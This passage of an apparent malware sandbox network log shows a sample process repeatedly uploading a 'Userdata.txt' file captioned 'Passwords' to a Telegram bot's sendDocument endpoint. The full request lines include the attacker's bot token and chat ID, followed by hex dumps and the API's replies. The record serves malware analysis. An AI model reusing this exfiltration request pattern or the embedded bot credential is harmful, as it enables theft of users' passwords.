2025-01-10 22:12:34 UTC | 1090 | OUT | Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 32 61 35 64 39 66 39 63 36 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    Data Ascii: --===============8dd332a5d9f9c69Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:34 UTC | 388 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 10 Jan 2025 22:12:34 GMT
    Content-Type: application/json
    Content-Length: 534
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:34 UTC | 534 | IN | Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 30 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 35 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
    Data Ascii: {"ok":true,"result":{"message_id":44805,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547154,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.9 | 50020 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:35 UTC | 294 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd333ccb7fd9d3
    Host: api.telegram.org
    Content-Length: 1090
    Connection: Keep-Alive
2025-01-10 22:12:35 UTC | 1090 | OUT | Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 33 63 63 62 37 66 64 39 64 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    Data Ascii: --===============8dd333ccb7fd9d3Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:35 UTC | 388 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 10 Jan 2025 22:12:35 GMT
    Content-Type: application/json
    Content-Length: 534
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:35 UTC | 534 | IN | Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 35 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
    Data Ascii: {"ok":true,"result":{"message_id":44806,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547155,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.9 | 50022 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:37 UTC | 294 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd3351cb172d67
    Host: api.telegram.org
    Content-Length: 1090
    Connection: Keep-Alive
2025-01-10 22:12:37 UTC | 1090 | OUT | Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 35 31 63 62 31 37 32 64 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    Data Ascii: --===============8dd3351cb172d67Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:37 UTC | 388 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 10 Jan 2025 22:12:37 GMT
    Content-Type: application/json
    Content-Length: 534
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:37 UTC | 534 | IN | Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 35 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
    Data Ascii: {"ok":true,"result":{"message_id":44807,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547157,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.9 | 50024 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:38 UTC | 294 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd336809ef4d50
    Host: api.telegram.org
    Content-Length: 1090
    Connection: Keep-Alive
2025-01-10 22:12:38 UTC | 1090 | OUT | Data Ascii: --===============8dd336809ef4d50Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:39 UTC | 388 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 10 Jan 2025 22:12:38 GMT
    Content-Type: application/json
    Content-Length: 534
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:39 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":44808,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547158,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.9 | 50026 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:40 UTC | 294 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd337ceb19b4f4
    Host: api.telegram.org
    Content-Length: 1090
    Connection: Keep-Alive
2025-01-10 22:12:40 UTC | 1090 | OUT | Data Ascii: --===============8dd337ceb19b4f4Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:40 UTC | 388 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 10 Jan 2025 22:12:40 GMT
    Content-Type: application/json
    Content-Length: 534
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:40 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":44809,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547160,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.9 | 50028 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:42 UTC | 294 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd3395a3db7cbe
    Host: api.telegram.org
    Content-Length: 1090
    Connection: Keep-Alive
2025-01-10 22:12:42 UTC | 1090 | OUT | Data Ascii: --===============8dd3395a3db7cbeContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:42 UTC | 388 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 10 Jan 2025 22:12:42 GMT
    Content-Type: application/json
    Content-Length: 534
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:42 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":44810,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547162,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.9 | 50030 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:43 UTC | 294 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd33abb28677f1
    Host: api.telegram.org
    Content-Length: 1090
    Connection: Keep-Alive
2025-01-10 22:12:43 UTC | 1090 | OUT | Data Ascii: --===============8dd33abb28677f1Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:43 UTC | 388 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 10 Jan 2025 22:12:43 GMT
    Content-Type: application/json
    Content-Length: 534
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:43 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":44811,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547163,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.9 | 50032 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:45 UTC | 270 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd33c5920c0b5c
    Host: api.telegram.org
    Content-Length: 1090
2025-01-10 22:12:45 UTC | 1090 | OUT | Data Ascii: --===============8dd33c5920c0b5cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:45 UTC | 388 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 10 Jan 2025 22:12:45 GMT
    Content-Type: application/json
    Content-Length: 534
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:45 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":44812,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547165,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          31192.168.2.950034149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:46 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd33df5e6a49aa
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 22:12:46 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 64 66 35 65 36 61 34 39 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd33df5e6a49aaContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:47 UTC | 388 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 10 Jan 2025 22:12:47 GMT
    Content-Type: application/json
    Content-Length: 534
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:47 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":44813,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547167,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.9 | 50036 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:48 UTC | 270 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd33fe3ac1ecdf
    Host: api.telegram.org
    Content-Length: 1090
2025-01-10 22:12:48 UTC | 1090 | OUT | Data Ascii: --===============8dd33fe3ac1ecdfContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:48 UTC | 388 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 10 Jan 2025 22:12:48 GMT
    Content-Type: application/json
    Content-Length: 534
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:48 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":44814,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547168,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.9 | 50038 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:50 UTC | 294 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd341f90415bea
    Host: api.telegram.org
    Content-Length: 1090
    Connection: Keep-Alive
2025-01-10 22:12:50 UTC | 1090 | OUT | Data Ascii: --===============8dd341f90415beaContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:50 UTC | 388 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 10 Jan 2025 22:12:50 GMT
    Content-Type: application/json
    Content-Length: 534
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:50 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":44815,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547170,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.9 | 50040 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:51 UTC | 294 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd343e3f0cbb2f
    Host: api.telegram.org
    Content-Length: 1090
    Connection: Keep-Alive
2025-01-10 22:12:51 UTC | 1090 | OUT | Data Ascii: --===============8dd343e3f0cbb2fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:52 UTC | 388 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 10 Jan 2025 22:12:52 GMT
    Content-Type: application/json
    Content-Length: 534
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:52 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":44816,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547171,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.9 | 50042 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:53 UTC | 294 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd34647c437859
    Host: api.telegram.org
    Content-Length: 1090
    Connection: Keep-Alive
2025-01-10 22:12:53 UTC | 1090 | OUT | Data Ascii: --===============8dd34647c437859Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:53 UTC | 388 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 10 Jan 2025 22:12:53 GMT
    Content-Type: application/json
    Content-Length: 535
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:53 UTC | 535 | IN | Data Ascii: {"ok":true,"result":{"message_id":44817,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547173,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.9 | 50044 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:55 UTC | 294 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd348d28405116
    Host: api.telegram.org
    Content-Length: 1090
    Connection: Keep-Alive
2025-01-10 22:12:55 UTC | 1090 | OUT | Data Ascii: --===============8dd348d28405116Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:55 UTC | 388 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 10 Jan 2025 22:12:55 GMT
    Content-Type: application/json
    Content-Length: 534
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:55 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":44818,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547175,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
